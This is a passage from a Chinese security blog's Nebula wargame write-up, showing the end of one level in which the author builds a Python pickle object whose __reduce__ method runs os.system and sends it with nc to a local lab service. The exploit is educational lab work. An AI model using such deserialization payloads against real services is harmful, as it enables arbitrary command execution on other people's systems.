skt.accept()</div><div class="line"></div><div class="line">  if(os.fork() == 0):</div><div class="line">      clnt.send(&quot;Accepted connection from %s:%d&quot; % (addr[0], addr[1]))</div><div class="line">      server(clnt)</div><div class="line">      exit(1)</div></pre></td></tr></table></figure></p>
<p>详情参加官方文档 [<a href="https://docs.python.org/2/library/pickle.html" target="_blank" rel="external">https://docs.python.org/2/library/pickle.html</a>]</p>
<p>问题出来pickle模块的loads方法，在如果dumps了一个object类型数据，则在loads时会执行其中的<strong>reduce</strong>方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line"># level16.py</div><div class="line">#!/usr/bin/env python</div><div class="line">#-*- coding:utf-8 -*-</div><div class="line"></div><div class="line">import os</div><div class="line">import pickle</div><div class="line"></div><div class="line">class ttt(object):</div><div class="line">	def __reduce__(self):</div><div class="line">		return (os.system,(&quot;getflag&gt;/tmp/flag16&quot;,))</div><div class="line">		</div><div class="line">		</div><div class="line">a = pickle.dumps(ttt())</div><div class="line">print a</div><div class="line">#b = pickle.loads(a)</div></pre></td></tr></table></figure>
<p>可以自己在本地测试一下。。我的修炼还是不够啊。。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">level16@nebula:/tmp$ python level16.py &gt; nc 127.0.0.1 10007</div><div class="line">Accepted connection from 127.0.0.1:59058^C</div><div class="line">level16@nebula:/tmp$ cat flag16</div><div class="line">You have successfully executed getflag on a target account</div></pre></td></tr></table></figure></p>
<p>底层系统的水太深了。。。</p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2016/02/14/0x0F/">Nebula Writeup</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">Hcamael</a></p>
        <p><span>发布时间:</span>2016-02-14, 10:16:46</p>
        <p><span>最后更新:</span>2017-07-26, 11:26:12</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2016/02/14/0x0F/" title="Nebula Writeup">http://0x48.pw/2016/02/14/0x0F/</a>
            <span class="copy-path" data-clipboard-text="原文: http://0x48.pw/2016/02/14/0x0F/　　作者: Hcamael" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="//qn.lazysheep.cc/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2016/03/07/0x11/">
                    unholy Writeup
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2015/12/19/0x0E/">
                    12.19网络方向培训
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#附"><span class="toc-number">1.</span> <span class="toc-text">附</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level00"><span class="toc-number">2.</span> <span class="toc-text">Level00</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level01"><span class="toc-number">3.</span> <span class="toc-text">Level01</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level02"><span class="toc-number">4.</span> <span class="toc-text">Level02</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level03"><span class="toc-number">5.</span> <span class="toc-text">Level03</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level04"><span class="toc-number">6.</span> <span class="toc-text">Level04</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level05"><span class="toc-number">7.</span> <span class="toc-text">Level05</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level06"><span class="toc-number">8.</span> <span class="toc-text">Level06</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level07"><span class="toc-number">9.</span> <span class="toc-text">Level07</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level08"><span class="toc-number">10.</span> <span class="toc-text">Level08</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level09"><span class="toc-number">11.</span> <span class="toc-text">Level09</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level10"><span class="toc-number">12.</span> <span class="toc-text">Level10</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level11"><span class="toc-number">13.</span> <span class="toc-text">Level11</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level12"><span class="toc-number">14.</span> <span class="toc-text">Level12</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level13"><span class="toc-number">15.</span> <span class="toc-text">Level13</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level14"><span class="toc-number">16.</span> <span class="toc-text">Level14</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level15"><span class="toc-number">17.</span> <span class="toc-text">Level15</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level16"><span class="toc-number">18.</span> <span class="toc-text">Level16</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Level17"><span class="toc-number">19.</span> <span class="toc-text">Level17</span></a></li></ol>
</div>
<style>
    .left-col .switch-btn {
        display: none;
    }
    .left-col .switch-area {
        display: none;
    }
</style>

<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }

    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
            $(".switch-btn, .switch-area").fadeOut(300);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
            $(".switch-btn, .switch-area").fadeIn(500);
        }
    })

    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
        $(".switch-btn, .switch-area").show();
    }
</script>






    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2016/03/07/0x11/" title="上一篇: unholy Writeup">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2015/12/19/0x0E/" title="下一篇: 12.19网络方向培训">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2017/08/07/0x37/">malloc.c源码阅读之__libc_free</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/01/0x36/">堆溢出学习之0CTF 2017 Babyheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/25/0x35/">glibc malloc学习笔记之fastbin🐦</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/12/0x34/">对虚拟机进行磁盘扩容🐥</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/05/23/0x33/">ROP小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/05/0x32/">Triton学习笔记(三)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/03/0x31/">Triton学习笔记(二)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/04/02/0x30/">Triton学习笔记(一)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/20/0x2f/">记一次手撸CPython bytecode</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/17/0x2e/">填坑</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/14/0x2d/">栈溢出之绕过CANARY保护</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/13/0x2c/">Linux系统下格式化字符串利用研究</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/17/0x2b/">Pwnhub之深入敌后writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/01/06/0x2a/">CVE-2016-6313 随机数预测分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/28/0x29/">phpmailer RCE 分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/28/0x28/">2016 HCTF Crypto 出题总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/21/0x27/">PWN学习总结之基础栈溢出2</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/11/03/0x26/">PWN学习总结之基础栈溢出</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/14/0x24/">HITCON 2016 Web 总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/12/0x23/">2016 HITCON Crypto -- PAKE(++)</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/09/13/0x22/">php bugs 72663分析(CVE-2016-7124)</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/31/0x21/">Cisco ASA RCE 环境搭建</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/16/0x20/">LNMP + phpenv 实现不同虚拟主机使用不同版本的PHP</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/10/0x1F/">CVE-2016-6174漏洞分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/07/14/0x1E/">三个白帽之火币网2W大挑战</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/06/27/0x1D/">寻找来自星星的你第二期Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/06/17/0x1C/">三个白帽之招聘又开始了，你怕了吗？-Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/05/10/0x1B/">SCTF Code Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/05/03/0x1A/">GGCTF的对称密码学</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/04/17/0x19/">How old are Crypto?</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/04/08/0x18/">MySQLi-Error Injection</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/04/04/0x17/">Python 使用dpkt分析数据包</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/04/01/0x16/">CRYPTO技能修正</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/03/21/0x15/">Pentester Lab Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/03/17/0x14/">0CTF RSA?总结 || RSA学习笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/03/15/0x13/">This is AliCTF?</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/03/14/0x12/">0CTF总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/03/07/0x11/">unholy Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/02/14/0x0F/">Nebula Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/12/19/0x0E/">12.19网络方向培训</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/12/08/0x0D/">HCTF之Black-Eat-Black总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/12/01/0x0C/">Python 的 BaseHTTPServer模块分析小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/10/31/0x0B/">10.31新生培训</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/10/05/0x09/">不使用select情况下的各种盲注</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/10/03/0x08/">2015XDCTF低分Web题writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/08/07/0x06/">WeChall Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/07/22/0x04/">git小记</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/07/19/0x02/">对于硬盘事件的随想</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/07/19/0x01/">对于这次硬盘坏掉事件小记</a></li><li class="post-list-item"><a class="post-list-link" href="/2015/07/19/0x00/">跳转到以前的博文</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2017 Hcamael
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题">Yelee</a> by MOxFIVE
            </div>
        </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.1.22/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 4;
                var backgroundimg = "url(http://qn.lazysheep.cc/bg/bg-xxxx.jpg)".replace(/xxxx/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>




<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>

    <script src="//cdn.bootcss.com/jqueryui/1.10.4/jquery-ui.min.js"></script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div><!-- hexo-inject:begin --><!-- Begin: Injected MathJax -->
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({"tex2jax":{"inlineMath":[["$","$"],["\\(","\\)"]],"skipTags":["script","noscript","style","textarea","pre","code"],"processEscapes":true},"TeX":{"equationNumbers":{"autoNumber":"AMS"}}});
</script>

<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
      all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>

<script type="text/javascript" src="//cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<!-- End: Injected MathJax -->
<!-- hexo-inject:end -->
</body>
</html>